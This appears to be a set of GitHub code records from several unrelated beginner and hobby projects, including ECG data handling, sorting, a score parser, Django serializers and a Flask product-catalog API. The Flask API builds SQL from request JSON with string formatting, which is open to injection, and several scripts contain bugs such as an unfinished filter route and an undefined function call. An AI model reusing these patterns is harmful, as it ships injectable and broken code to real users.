seg.endswith('_layout'):\n continue\n # Add all dat files of the segment\n recseg = rdheader(seg, pb_dir=posixpath.join(db_dir, dir_name))\n for file in recseg.file_name:\n allfiles.append(posixpath.join(dir_name, file))\n # check whether the record has any requested annotation files\n if annotators is not None:\n for a in annotators:\n annfile = rec+'.'+a\n url = posixpath.join(download.config.db_index_url, db_dir, annfile)\n rh = requests.head(url)\n\n if rh.status_code != 404:\n allfiles.append(annfile)\n\n dlinputs = [(os.path.split(file)[1], os.path.split(file)[0], db_dir, dl_dir, keep_subdirs, overwrite) for file in allfiles]\n\n # Make any required local directories\n download.make_local_dirs(dl_dir, dlinputs, keep_subdirs)\n\n print('Downloading files...')\n # Create multiple processes to download files.\n # Limit to 2 connections to avoid overloading the server\n pool = multiprocessing.Pool(processes=2)\n pool.map(download.dl_pb_file, dlinputs)\n print('Finished downloading files')\n\n return\n\n\n# -------------- WFDB Signal Calibration and Classification ---------- #\n\n\n# Unit scales used for default display scales.\nunit_scale = {\n 'voltage': ['pV', 'nV', 'uV', 'mV', 'V', 'kV'],\n 'temperature': ['C', 'F'],\n 'pressure': ['mmHg'],\n 'no_unit': ['NU'],\n 'percentage': ['%'],\n 'heart_rate': ['bpm'],\n}\n\n\n\"\"\"\nSignal classes that wfdb signals should fall under. The indexes are the\nabbreviated class names.\n\nParameters\n----------\ndescription:\n The full descriptive name for the signal class.\nunit_scale:\n The unit scale that the class should measure. 'No Unit' will also\n be allowed in all cases. * Will it always be 1?\nsignal_names:\n The signal names that belong to the class.\n\nNotes\n-----\nThis will be used to automatically classify signals in classes based\non their names.\n\n\"\"\"\n\nSIGNAL_CLASSES = pd.DataFrame(\n index=['bp', 'co2', 'co', 'ecg', 'eeg', 'emg', 'eog', 'hr', 'mmg',\n 'o2', 'pleth', 'resp', 'scg', 'stat', 'st', 'temp', 'unknown'],\n columns=['description', 'unit_scale', 'signal_names'],\n data=[['Blood Pressure', 'pressure', ['bp','abp','pap','cvp']], # bp\n ['Carbon Dioxide', 'percentage', ['co2', 'pco2']], # co2\n ['Carbon Monoxide', 'percentage', ['co']], # co\n ['Electrocardiogram', 'voltage', ['i','ii','iii','iv','v','avr']], # ecg\n ['Electroencephalogram', 'voltage', ['eeg']], # eeg\n ['Electromyograph', 'voltage', ['emg']], # emg\n ['Electrooculograph', 'voltage', ['eog']], # eog\n ['Heart Rate', 'heart_rate', ['hr']], # hr\n ['Magnetomyograph', 'voltage', ['mmg']], # mmg\n ['Oxygen', 'percentage', ['o2', 'spo2']], # o2\n ['Plethysmograph', 'pressure', ['pleth']], # pleth\n ['Respiration', 'no_unit', ['resp']], # resp\n ['Seismocardiogram', 'no_unit', ['scg']], # scg\n ['Status', 'no_unit', ['stat', 'status']], # stat\n ['ST Segment', '', ['st']], # st. This is not a signal?\n ['Temperature', 'temperature', ['temp']], # temp\n ['Unknown Class', 'no_unit', []], # unknown. special class.\n ]\n)\n","repo_name":"MasonYyp/wfdb_ecg","sub_path":"libs/wfdb/io/record.py","file_name":"record.py","file_ext":"py","file_size_in_byte":73524,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"21"} +{"seq_id":"24261602661","text":"import os\nimport glob\nimport shutil\n\ndef removeIpynbCheckpointsFromTrainingDataset():\n if (os.path.isdir('trainingDataset/.ipynb_checkpoints')):\n shutil.rmtree('trainingDataset/.ipynb_checkpoints')\n if (os.path.isdir('trainingDataset/train/.ipynb_checkpoints')):\n shutil.rmtree('trainingDataset/train/.ipynb_checkpoints')\n if (os.path.isdir('trainingDataset/val/.ipynb_checkpoints')):\n shutil.rmtree('trainingDataset/val/.ipynb_checkpoints')\n\ndef refreshTrainingDataset():\n if (os.path.isdir('trainingDataset')):\n shutil.rmtree('trainingDataset')\n os.mkdir('trainingDataset')\n os.mkdir('trainingDataset/train')\n os.mkdir('trainingDataset/train/normal')\n os.mkdir('trainingDataset/train/rollover')\n os.mkdir('trainingDataset/val')\n os.mkdir('trainingDataset/val/normal')\n os.mkdir('trainingDataset/val/rollover')\n \n\ndef cleanDataset(folder_path, file_extension):\n\n # Create a file path pattern to match files with the given extension\n file_pattern = os.path.join(folder_path, f'*.{file_extension}')\n\n # Use glob to find all files matching the pattern\n files_to_remove = glob.glob(file_pattern)\n\n # Remove each file\n for file_path in files_to_remove:\n try:\n os.remove(file_path)\n except OSError as e:\n print(f\"Error while deleting file: {file_path}\\n{e}\")\n\n\n\ndef cleanModel(folder_path):\n \n if not(os.path.isdir('model')):\n os.mkdir('model')\n \n # List all files and directories in the given folder\n items = os.listdir(folder_path)\n \n # Iterate through each item\n for item in items:\n item_path = os.path.join(folder_path, item)\n\n if os.path.isfile(item_path):\n # If the item is a file, remove it\n try:\n os.remove(item_path)\n except OSError as e:\n print(f\"Error while deleting file: {item_path}\\n{e}\")\n elif os.path.isdir(item_path):\n # If the item is a directory, recursively call the function\n remove_all_files_in_folder(item_path)\n","repo_name":"oliviermirat/ZZDeepRollover","sub_path":"zzdeeprollover/cleanFolders.py","file_name":"cleanFolders.py","file_ext":"py","file_size_in_byte":1934,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"28557191030","text":"# Ask the user to enter a number. \n# Print all the odd numbers between 0 and that number (inclusive).\n\n\nnumber = int(input(\"Enter a number: \"))\nnumber = 9\nfor i in range (1,number+1,2):\n print(i)\n i = i + 1\n\n\n\n \n","repo_name":"SheCodesAus/she-codes-python-exercises-mvmirhan","sub_path":"0_exercises/whileloops_q2.py","file_name":"whileloops_q2.py","file_ext":"py","file_size_in_byte":221,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"16171728857","text":"from sys import stdin\nfrom collections import deque\ndef dfs(x):\n global topo,visitados\n visitados[x] = True\n for u in graph[x]:\n if visitados[u] == False:\n dfs(u)\n topo.appendleft(x)\n \ndef main():\n global visitados , graph, topo\n nodos,aristas = [int(x) for x in stdin.readline().strip().split()]\n while nodos+aristas:\n graph = {}\n visitados = {}\n topo = deque()\n for x in range(1,nodos+1):\n graph[x] = []\n visitados[x] = False\n for x in range(aristas):\n a,b = [int(x) for x in stdin.readline().strip().split()]\n graph[a].append(b)\n for x in range(1,nodos+1):\n if visitados[x] == False:\n dfs(x)\n print(*topo)\n nodos,aristas = [int(x) for x in stdin.readline().strip().split()]\nmain()\n","repo_name":"CAndresRa/UvaSolution","sub_path":"10305 - Ordering Tasks.py","file_name":"10305 - Ordering Tasks.py","file_ext":"py","file_size_in_byte":852,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"31791020261","text":"\"\"\"\nauthor : Lee Sang Min\ngithub : https://github.com/sangm1n\ne-mail : dltkd96als@naver.com\n\ntitle : 트리 순회\ndescription : Tree\n\"\"\"\n\n\ndef preorder(root):\n if root != '.':\n print(root, end='')\n preorder(tree[root][0])\n preorder(tree[root][1])\n\n\ndef inorder(root):\n if root != '.':\n inorder(tree[root][0])\n print(root, end='')\n inorder(tree[root][1])\n\n\ndef postorder(root):\n if root != '.':\n postorder(tree[root][0])\n postorder(tree[root][1])\n print(root, end='')\n\n\nN = int(input())\ntree = dict()\nfor i in range(N):\n parent, left, right = map(str, input().split())\n tree[parent] = [left, right]\n\npreorder('A')\nprint()\ninorder('A')\nprint()\npostorder('A')\n","repo_name":"sangm1n/problem-solving","sub_path":"BOJ/1991.py","file_name":"1991.py","file_ext":"py","file_size_in_byte":736,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"30548633094","text":"from colored import fg, attr\n\nunderline = attr(4)\nbold = attr(1)\ntext = fg(99)\nreset = attr(0)\n\n# List of locations\nlocations = [\"street\", \"beach\", \"house\"]\n\n\ndef locationchoice(message):\n \"\"\"Test for checking if an input is a valid menu \"\"\"\n print(underline + text + bold + \"\\nPICK A LOCATION\" + reset)\n for l in locations:\n print(f\"* {l}\")\n # The while loop makes sure the program continues until the user\n # has inputted a valid menu\n while True:\n # The try statement attempts to exceute the user input\n try:\n userInput = str(input(message))\n # The if-else statement tests to see if the menu is valid\n # If the menu is valid then the program continues\n if userInput == \"street\":\n print(\"That's going to be challenging place.\")\n import tools\n print(tools.toolschoice(\"\"))\n return userInput\n\n elif userInput == \"beach\":\n print(\"What a beautiful scenery.\")\n import tools\n print(tools.toolschoice(\"\"))\n return userInput\n\n elif userInput == \"house\":\n print(\"Yikes. Clean house more.\")\n import tools\n print(tools.toolschoice(\"\"))\n return userInput\n # If the menu is invalid then the user must\n # try again\n\n else:\n print(\"Invalid choice. Please try again.\")\n continue\n # If the user input wrong location\n except NameError:\n print(\"Input is not available. Try again.\")\n continue\n\n# Using the function locationchoice to ask for the user inputs\nuserInput = locationchoice(\"\\nLOCATION: \")\nprint(userInput)\nprint(\"\\n\")\n","repo_name":"rbqi/CapstoneProject","sub_path":"locations.py","file_name":"locations.py","file_ext":"py","file_size_in_byte":1813,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"11384847041","text":"from rest_framework import serializers\n\nfrom .models import *\n\nclass households_serializer(serializers.ModelSerializer):\n class Meta:\n model=households\n fields=('id','latitude','longitude','monthly_income','person_count','house_image','image_link')\n\n def create(self, validated_data):\n\n return households.objects.create(**validated_data)\n\n def update(self, instance, validated_data):\n instance.latitude = validated_data.get('latitude', instance.latitude)\n instance.longitude = validated_data.get('longitude', instance.longitude)\n instance.monthly_income = validated_data.get('monthly_income', instance.monthly_income)\n instance.person_count = validated_data.get('person_count', instance.person_count)\n instance.house_image = validated_data.get('house_image', instance.house_image)\n instance.image_link = validated_data.get('image_link', instance.image_link)\n instance.save()\n return instance\n\nclass person_serializer(serializers.ModelSerializer):\n class Meta:\n model=person\n fields=('id','house_id','person_name','gender','date_of_birth')\n\n def create(self, validated_data):\n\n return person.objects.create(**validated_data)\n\n def update(self, instance, validated_data):\n instance.house_id = validated_data.get('house_id', instance.house_id)\n instance.person_name = validated_data.get('person_name', instance.person_name)\n instance.gender = validated_data.get('gender', instance.gender)\n instance.date_of_birth=validated_data.get('date_of_birth',instance.date_of_birth)\n instance.save()\n return instance\n\nclass farm_serializer(serializers.ModelSerializer):\n class Meta:\n model=farm\n fields=('id','house_id','farm_area','farm_points','farm_link')\n\n def create(self, validated_data):\n\n return farm.objects.create(**validated_data)\n\n def update(self, instance, validated_data):\n instance.house_id = validated_data.get('house_id', instance.house_id)\n instance.farm_area = validated_data.get('farm_area', instance.farm_area)\n instance.farm_points = validated_data.get('farm_points', instance.farm_points)\n instance.farm_link = validated_data.get('farm_link', instance.farm_link)\n instance.save()\n return instance\n\nclass farm_shape_serializer(serializers.ModelSerializer):\n class Meta:\n model=farm_shape\n fields=('farm_id','lat','lon','sequence_number')\n\n def create(self, validated_data):\n\n return farm_shape.objects.create(**validated_data)\n\n def update(self, instance, validated_data):\n instance.lat = validated_data.get('lat', instance.lat)\n instance.lon = validated_data.get('lon', instance.lon)\n instance.sequence_number = validated_data.get('sequence_number', instance.sequence_number)\n instance.save()\n return instance\n\nclass crops_serializer(serializers.ModelSerializer):\n class Meta:\n model=crops\n fields=('id','crop_name')\n\n def create(self, validated_data):\n\n return crops.objects.create(**validated_data)\n\n def update(self, instance, validated_data):\n instance.crop_name = validated_data.get('crop_name', instance.crop_name)\n instance.save()\n return instance\n\nclass season_wise_crop_serializer(serializers.ModelSerializer):\n class Meta:\n model=season_wise_crop\n fields=('id','season_name','crop_name','farm_id','area_cultivated')\n\n def create(self, validated_data):\n\n return season_wise_crop.objects.create(**validated_data)\n\n def update(self, instance, validated_data):\n instance.season_name = validated_data.get('season_name', instance.season_name)\n instance.crop_name = validated_data.get('crop_name', instance.crop_name)\n instance.farm_id = validated_data.get('farm_id', instance.farm_id)\n instance.area_cultivated=validated_data.get('area_cultivated',instance.area_cultivated)\n instance.save()\n return instance\n\nclass wells_serializer(serializers.ModelSerializer):\n class Meta:\n model=wells\n fields=('id','latitude','longitude','depth','avg_water_yield')\n\n def create(self, validated_data):\n\n return wells.objects.create(**validated_data)\n\n def update(self, instance, validated_data):\n instance.latitude = validated_data.get('latitude', instance.latitude)\n instance.longitude = validated_data.get('longitude', instance.longitude)\n instance.depth = validated_data.get('depth', instance.depth)\n instance.avg_water_yield = validated_data.get('avg_water_yield', instance.avg_water_yield)\n instance.save()\n return instance\n\nclass well_observations_serializer(serializers.ModelSerializer):\n class Meta:\n model=well_observations\n fields=('id','date_time','well_id','water_yield')\n\n def create(self, validated_data):\n\n return well_observations.objects.create(**validated_data)\n\n def update(self, instance, validated_data):\n instance.date_time = validated_data.get('date_time', instance.date_time)\n instance.well_id = validated_data.get('well_id', instance.well_id)\n instance.water_yield = validated_data.get('water_yield', instance.water_yield)\n instance.save()\n return instance","repo_name":"Saivishal27/Group11_ITS_Server","sub_path":"Farms/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":5336,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"14090287563","text":"from pyDSAlgo.Algo import PyAlgo\n\n\nclass PyMergeSort(PyAlgo):\n def __init__(self, arr):\n super().__init__()\n self.arr = arr\n\n @staticmethod\n def merge(left, right):\n result = []\n i = j = 0\n\n while i < len(left) and j < len(right):\n if left[i] < right[j]:\n result.append(left[i])\n i += 1\n else:\n result.append(right[j])\n j += 1\n\n result.extend(left[i:])\n result.extend(right[j:])\n\n return result\n\n def sort(self):\n if len(self.arr) <= 1:\n return self.arr\n\n mid = len(self.arr) // 2\n left_half = self.arr[:mid]\n right_half = self.arr[mid:]\n\n left_sorted = PyMergeSort(left_half).sort()\n right_sorted = PyMergeSort(right_half).sort()\n\n return self.merge(left_sorted, right_sorted)\n","repo_name":"sattyamjjain/pyDSAlgo","sub_path":"pyDSAlgo/Algo/Sorting/PyMergeSort.py","file_name":"PyMergeSort.py","file_ext":"py","file_size_in_byte":888,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"73888872372","text":"import re\n\nclass Print:\n def __init__(self, edition, print_id, partiture):\n self.edition = edition\n self.print_id = print_id\n self.partiture = partiture\n \n # maybe DONE\n def format(self):\n print(\"Print Number: \"+str(self.print_id))\n \n if self.edition.composition.authors:\n persons = \"\"\n for person in self.edition.composition.authors:\n if person.born is not None:\n if person.died is not None:\n persons += \"{} ({}--{}); \".format(person.name,person.born,person.died)\n else:\n persons += \"{} ({}--); \".format(person.name,person.born)\n else:\n if person.died is not None:\n persons += \"{} (--{}); \".format(person.name,person.died)\n else:\n persons += \"{}; \".format(person.name)\n \n print(\"Composer: \" + persons[:-2])\n if self.edition.composition.name is not None:\n print(\"Title: \" + self.edition.composition.name)\n if self.edition.composition.genre is not None:\n print(\"Genre: \" + self.edition.composition.genre)\n if self.edition.composition.key is not None:\n print(\"Key: \" + self.edition.composition.key)\n if self.edition.composition.year is not None:\n print(\"Composition Year: \" + str(self.edition.composition.year))\n if self.edition.name is not None:\n print(\"Edition: \" + self.edition.name)\n if self.edition.authors:\n authors = \"\"\n for author in self.edition.authors:\n authors += \"{}, \".format(author.name)\n print(\"Editor: \" + authors[:-2])\n if self.edition.composition.voices:\n for i in range(len(self.edition.composition.voices)):\n voice = self.edition.composition.voices[i]\n if voice is None:\n continue\n if voice.range is not None and voice.name is not None:\n print(\"Voice {}: {}, {}\".format(i+1,voice.range,voice.name))\n elif voice.name is not None:\n print(\"Voice {}: {}\".format(i+1,voice.name))\n else:\n print(\"Voice {}: {}\".format(i+1,voice.range))\n if self.partiture:\n print(\"Partiture: yes\")\n else:\n print(\"Partiture: no\")\n if self.edition.composition.incipit is not None:\n print(\"Incipit: \" + self.edition.composition.incipit)\n\n def composition(self):\n return self.edition.composition\n\n\nclass Edition:\n def __init__(self,composition,authors,name):\n self.composition = composition\n self.authors = authors\n self.name = name\n\nclass Composition:\n def __init__(self, name, incipit, key, genre, year, voices, authors):\n self.name = name\n self.incipit = incipit\n self.key = key\n self.genre = genre\n self.year = year\n self.voices = voices\n self.authors = authors\n\nclass Voice:\n def __init__(self, name, range):\n self.name = name\n self.range = range\n\nclass Person:\n def __init__(self, name, born, died):\n self.name = name\n self.born = born\n self.died = died\n\n def __str__(self):\n return self.name\n\nclass Template:\n def __init__(self):\n self.print_num = None\n self.composers = []\n self.title = None\n self.genre = None\n self.key = None\n self.comp_year = None\n self.edition = None\n self.editors = []\n self.voices = []\n self.partiture = False\n self.incipit = None\n \n # helper method for debugging\n def __str__(self):\n return \"PN: {}\\nCOMP: {}\\nTitle: {}\\nGenre: {}\\nKey: {}\\nCompYear: {}\\nEdition: {}\\nEditors: {}\\nVoices: {}\\nPartiture: {}\\nIncipit: {}\\n\".format(self.print_num,\n self.composers,\n self.title,\n self.genre,\n self.key,\n self.comp_year,\n self.edition,\n self.editors,\n self.voices,\n self.partiture,\n self.incipit\n )\n \n# DONE\ndef load(filename):\n prints = []\n tmpValues = Template()\n for line in open(filename,\"r\"):\n if line == '\\n': # save current print, and create blank one from template\n if tmpValues.print_num is not None: # when there are more new lines between prints, ignore second one\n prints.append(Print(Edition(Composition(tmpValues.title\n ,tmpValues.incipit,tmpValues.key,tmpValues.genre\n ,tmpValues.comp_year,tmpValues.voices\n ,tmpValues.composers),tmpValues.editors\n ,tmpValues.edition),tmpValues.print_num\n ,tmpValues.partiture))\n tmpValues = Template()\n # DONE\n if line.startswith(\"Print Number\"):\n number = line.split(':')[1].strip()\n tmpValues.print_num = None if number == \"\" else int(number)\n # DONE\n if line.startswith(\"Composer\"):\n r = re.compile(r\"Composer: (.*)\")\n m = r.match(line)\n if m is None or m.group(1) == \"\": # when there is no name\n continue\n rawcomp = m.group(1)\n comp = rawcomp.split(\";\")\n for c in comp:\n if not c:\n continue\n s = re.compile(r\"(.*) \\((.*)\\)\") # separete name and years\n n = s.match(c)\n if n is None: # doesnt have (years)\n composer = Person(c.strip(),None,None)\n tmpValues.composers.append(composer)\n else:\n name = n.group(1).strip()\n n.group(2).strip()\n t = re.compile(r\"\\d{4}\") # pattern for four digits = year\n born = None\n died = None\n if \"-\" in n.group(2):\n # if there is \"-\", split by \"-\" or \"--\"\n if \"--\" in n.group(2):\n years = n.group(2).split(\"--\")\n else:\n years = n.group(2).split(\"-\")\n o = t.match(years[0]) if len(years[0]) == 4 else None\n if o is not None:\n born = int(o.group(0))\n o = t.match(years[1]) if len(years[1]) == 4 else None\n if o is not None:\n died = int(o.group(0))\n else: # otherwise try to find *,+, or there will be only one year\n if \"*\" in n.group(2):\n o = t.match(n.group(2)[1:]) if len(n.group(2)[1:]) == 4 else None\n if o is not None and o.group(0) != \"\":\n born = int(o.group(0))\n elif \"+\" in n.group(2):\n o = t.match(n.group(2)[1:]) if len(n.group(2)[1:]) == 4 else None\n if o is not None and o.group(0) != \"\":\n died = int(o.group(0))\n else: # when there is only one year, i assign it to born\n o = t.match(n.group(2)) if len(n.group(2)) == 4 else None\n if o is not None and o.group(0) != \"\":\n born = int(o.group(0))\n tmpValues.composers.append(Person(name, born, died))\n # DONE\n if line.startswith(\"Title\"):\n r = re.compile(r\"Title: (.*)\")\n m = r.match(line)\n if m is not None and m.group(1) != \"\":\n title = m.group(1).strip()\n tmpValues.title = None if title == \"\" else title\n # DONE\n if line.startswith(\"Genre\"):\n r = re.compile(r\"Genre: (.*)\")\n m = r.match(line)\n if m is not None and m.group(1) != \"\":\n genre = m.group(1).strip()\n tmpValues.genre = None if genre == \"\" else genre\n # DONE\n if line.startswith(\"Key\"):\n r = re.compile(r\"Key: (.*)\")\n m = r.match(line)\n if m is not None and m.group(1) != \"\":\n key = m.group(1).strip()\n tmpValues.key = None if key == \"\" else key\n # DONE\n if line.startswith(\"Composition Year\"):\n r = re.compile(r\"Composition Year: (\\d{4})\")\n m = r.match(line)\n if m is not None:\n tmpValues.comp_year = int(m.group(1)) if len(m.group(1)) == 4 else None\n # DONE\n if line.startswith(\"Edition\"):\n r = re.compile(r\"Edition: (.*)\")\n m = r.match(line)\n edition = m.group(1).strip()\n tmpValues.edition = None if edition == \"\" else edition\n # DONE\n if line.startswith(\"Editor\"):\n r = re.compile(r\"Editor: (.*)\")\n m = r.match(line)\n if m is not None and m.group(1) != \"\":\n r = re.compile(r\"((\\w+, \\w+.?),?)+\") # pattern for word, word = lastname, firstname and there may be comma and other persons\n text = m.group(1)\n if r.match(text) is not None: # if firstname and lastname are separated by comma\n while text != \"\":\n m = r.match(text) # match them\n tmpValues.editors.append(Person(m.group(2).strip(), None,None))# add them to output\n text = text.replace(m.group(2), \"\")[2:] # remove them from string; # [2:] because there is \", \" left in the beginning\n else: # if firstname and lastname are together, and persons are separated by comma\n comps = text.split(\",\")\n for comp in comps:\n tmpValues.editors.append(Person(comp.strip(),None,None))\n # DONE\n if line.startswith(\"Voice\"):\n n = re.compile(r\"Voice (\\d*):(.*)\")\n o = n.match(line)\n if o is None:\n print(\"\\\"{}\\\"\".format(line))\n number = int(o.group(1).strip())\n voice = o.group(2).strip() if o is not None else None\n range = None\n name = None\n if voice is not None and voice != \"\": # if there is some voice\n r = re.compile(r\"(\\w+--[\\w\\(\\)]+).*\") # match two words and \"--\"\" between them\n m = r.match(voice)\n if m is not None: # if there is range\n range = m.group(1)\n voice = voice.replace(m.group(1),\"\")[2:].strip() # strip range and \", \"\n name = None\n if voice != \"\":\n name = voice # if there is anything left for the name, assign it\n else: # there is no range\n name = voice.strip()\n # else: # there is no voice, but i need to remember position (Voice Number)\n # tmpValues.voices.append(None)\n while len(tmpValues.voices) < number-1:\n tmpValues.voices.append(None)\n if name == None and range == None:\n tmpValues.voices.append(None)\n else:\n tmpValues.voices.append(Voice(name,range))\n # DONE\n if line.startswith(\"Partiture\"):\n r = re.compile(r\"Partiture: (.*)\")\n m = r.match(line)\n if m is not None and m.group(1) != \"\": \n partiture = m.group(1).strip()\n if \"yes\" in partiture:\n tmpValues.partiture = True\n # DONE\n if line.startswith(\"Incipit\"):\n r = re.compile(r\"Incipit: (.*)\")\n m = r.match(line)\n if m is not None and m.group(1) != \"\":\n incipit = m.group(1).strip()\n if incipit != \"\" and tmpValues.incipit == None:\n tmpValues.incipit = incipit\n # on last print it doesnt catch new line at the end of the file\n # so after assigning all tmpValues, it ends reading the file in Incipit\n # and doesnt add it to prints\n # till it is still saved in tmValues\n # i can add that print afterwards\n # when there are two new lines at the end\n # then the last print will be added in for loop\n # and this condition catches that option\n # so it wont add new new print with deafalut None print number\n if tmpValues.print_num is not None:\n prints.append(Print(Edition(Composition(tmpValues.title\n ,tmpValues.incipit,tmpValues.key,tmpValues.genre\n ,tmpValues.comp_year,tmpValues.voices\n ,tmpValues.composers),tmpValues.editors\n ,tmpValues.edition),tmpValues.print_num\n ,tmpValues.partiture))\n return prints\n","repo_name":"makovako/PV248-valko","sub_path":"03-database/scorelib.py","file_name":"scorelib.py","file_ext":"py","file_size_in_byte":12959,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"27354979350","text":"from flask import Flask,redirect,url_for,request,render_template, jsonify\nfrom flask_restful import reqparse\nfrom flask_mysqldb import MySQL\nimport yaml\n\n\napp = Flask(__name__)\n\n#Configure db\ndb = yaml.load(open('db.yaml'))\napp.config['MYSQL_HOST'] = db['mysql_host']\napp.config['MYSQL_USER'] = db['mysql_user']\napp.config['MYSQL_PASSWORD'] = db['mysql_password']\napp.config['MYSQL_DB'] = db['mysql_db']\n\nmysql = MySQL(app)\n\n\n@app.route('/query', methods=['POST'])\ndef query():\n\tdata = request.get_json()\n\tcur = mysql.connection.cursor()\n\tif data['query'] == 'SORT':\n\t\tif data['props']==0:\n\t\t\tx = \"name\"\n\t\tif data['props']==1:\n\t\t\tx = \"name\"\n\t\tif data['props']==2:\n\t\t\tx = \"name desc\"\n\n\t\tresult = cur.execute(\"select * from products order by {}\".format(x))\n\n\t\tprods = []\n\t\tprodDetails = cur.fetchall()\n\t\t\t\t\n\t\tfor item in prodDetails:\n\t\t\tprods.append({\n\t\t\t\t'productID' : item[0],\n\t\t\t\t'name' : item[1],\n\t\t\t\t'url' : item[3],\n\t\t\t\t'price' : item[6]\n\t\t\t})\n\t\t\t\n\t\tmysql.connection.commit()\n\t\tcur.close()\n\t\treturn jsonify({'prods':prods})\n\n\tif data['query'] == 'FILTER':\n\t\tqueryStr=\"\"\n\t\tif data['brand']:\n\t\t\ts = \"(\"\n\t\t\tfor x in range(data['brand']):\n\t\t\t\tx_val = data['brand'][x];\n\t\t\t\ts = s+\"'\"+x_val+\"',\" \n\t\t\ts = s[:-1]+\")\"\n\t\t\tqueryStr= queryStr + \"brand in \" + s\n\n\t\tif data['price']:\n\t\t\tfor x in data['price']:\n\t\t\t\tif x==0:\n\t\t\t\t\tqueryStr = queryStr + \"and price between 0 and 499\"\n\t\t\t\tif x==1:\n\t\t\t\t\tqueryStr = queryStr + \"and price between 500 and 999\"\n\t\t\t\tif x==2:\n\t\t\t\t\tqueryStr = queryStr + \"and price >= 1000\"\n\t\t\t\n\t\tif data['color']:\n\t\t\ts = \"(\"\n\t\t\tfor x in range(data['color']):\n\t\t\t\tx_val = data['color'][x];\n\t\t\t\ts = s+\"'\"+x_val+\"',\" \n\t\t\ts = s[:-1]+\")\"\n\t\t\tqueryStr= queryStr + \"color in \" + s\n\t\t\t\n\t\tcur.execute(\"select * from products where brand in {} and color in {} and price between\".format())\n\n\n# @app.route('/fliter',methods=['POST'])\n# def filter():\n# \tdata = request.get_json()\n\n\n# @app.route('/validateInventory/')\n# def val(prodID):\n# \treturn #\"yes\" or \"no\"\n\n# @app.route('/prodDescription/')\n# def prodDescription(prodID):\n# \treturn #description\n\n# @app.route('/inventoryUpdate',methods=['POST'])\n# def inventoryUpdate():\n# \tdata = request.get_json()\n# \treturn #Success or Failure\n\n\n#Admin CRUD APIs\n\n@app.route('/admin/',methods=['POST', 'DELETE'])\ndef crudOps(type):\n\tcur = mysql.connection.cursor()\n\tif request.method == 'POST':\n\t\tif type == 'READ':\n\t\t\tdata = request.get_json()\n\n\t\t\tresult = cur.execute(\"select * from products where {} = '{}'\".format(data['category'], data['value']))\n\n\t\t\tprods = []\n\t\t\t\n\t\t\tif(result > 0):\n\t\t\t\tprodDetails = cur.fetchall()\n\t\t\t\t\n\t\t\t\tfor item in prodDetails:\n\t\t\t\t\tprods.append({\n\t\t\t\t\t\t'productID' : item[0],\n\t\t\t\t\t\t'name' : item[1],\n\t\t\t\t\t\t'url' : item[3],\n\t\t\t\t\t\t'price' : item[6]\n\t\t\t\t\t})\n\t\t\t\t\n\t\t\tmysql.connection.commit()\n\t\t\tcur.close()\n\t\t\treturn jsonify({'prods':prods})\n\n\t\tif type == 'UPDATE':\n\t\t\tdata = request.get_json()\n\n\t\t\tif(data['name']):\n\t\t\t\tcur.execute(\"update products set name = '{}' where productID = {}\".format(data['name'], data['productID']))\n\n\t\t\tif(data['url']):\n\t\t\t\tcur.execute(\"update products set imageURL = '{}' where productID = {}\".format(data['url'], data['productID']))\n\n\t\t\tif(data['price']):\n\t\t\t\tcur.execute(\"update products set price = {} where productID = {}\".format(data['price'], data['productID']))\n\n\t\t\tmysql.connection.commit()\n\t\t\tcur.close()\n\n\t\t\treturn 'success'\n\t\t\n\t\t# Create product\n\t\tdata = request.get_json()\n\n\t\ttag = data['brand'] + '-' + data['color'] + '-' + str(data['price'])\n\t\t\t\n\n\t\tcur.execute(\"insert into products(name, description, imageURL, brand, color, price, category,createTime) values('{}','{}','{}','{}','{}',{},'{}',CURRENT_TIMESTAMP())\".format(data['name'],data['description'],data['url'],data['brand'],data['color'],data['price'],data['category']))\n\t\tmysql.connection.commit()\n\n\t\tresult = cur.execute(\"select * from products\")\n\t\tout = cur.fetchall();\n\t\tx = out[-1][0];\n\n\t\tcur.execute(\"insert into tags values({},'{}')\".format(x,tag))\n\t\tcur.execute(\"insert into inventory values({},{})\".format(x,data['qty']))\n\n\t\tmysql.connection.commit()\n\t\tcur.close()\n\n\t\treturn 'success'\n\n\t#DELETE\n\tdata = request.get_json()\n\tcur.execute(\"delete from products where productID = {}\".format(data['productID']))\n\tmysql.connection.commit()\n\tcur.close()\n\n\treturn 'success'\n\n\nif __name__ == '__main__':\n\tapp.debug = True\n\tapp.run()","repo_name":"utknyk/serverCatlog","sub_path":"catlog.py","file_name":"catlog.py","file_ext":"py","file_size_in_byte":4327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"69949348268","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\nimport os.path\nimport string\n\nDATA_DIR='../data'\nLOG_DIR='../log'\nRESOURCES_DIR='../../../../resources'\n\nRSS_DIR=os.path.join(DATA_DIR, 'rss')\nRSS_URLS_DIR=os.path.join(RSS_DIR, 'urls')\nRSS_HTML_DIR=os.path.join(RSS_DIR, 'html')\nRSS_HTML_INDEX_DIR=os.path.join(RSS_DIR, 'index')\nRSS_LOG_DIR=os.path.join(LOG_DIR, 'rss')\nLABEL_SINCE_FILE=os.path.join(RSS_URLS_DIR, 'label_since.json')\n\n\nFB_DIR=os.path.join(DATA_DIR, 'fb')\nFB_URLS_DIR=os.path.join(FB_DIR, 'urls')\nFB_HTML_DIR=os.path.join(FB_DIR, 'html')\nFB_HTML_INDEX_DIR=os.path.join(FB_DIR, 'index')\nFB_LOG_DIR=os.path.join(LOG_DIR, 'fb')\n\nHTML_PARSER_LOG_DIR=os.path.join(LOG_DIR, 'html_parser')\n\nARABIC_VERBS_FILE=os.path.join(RESOURCES_DIR, 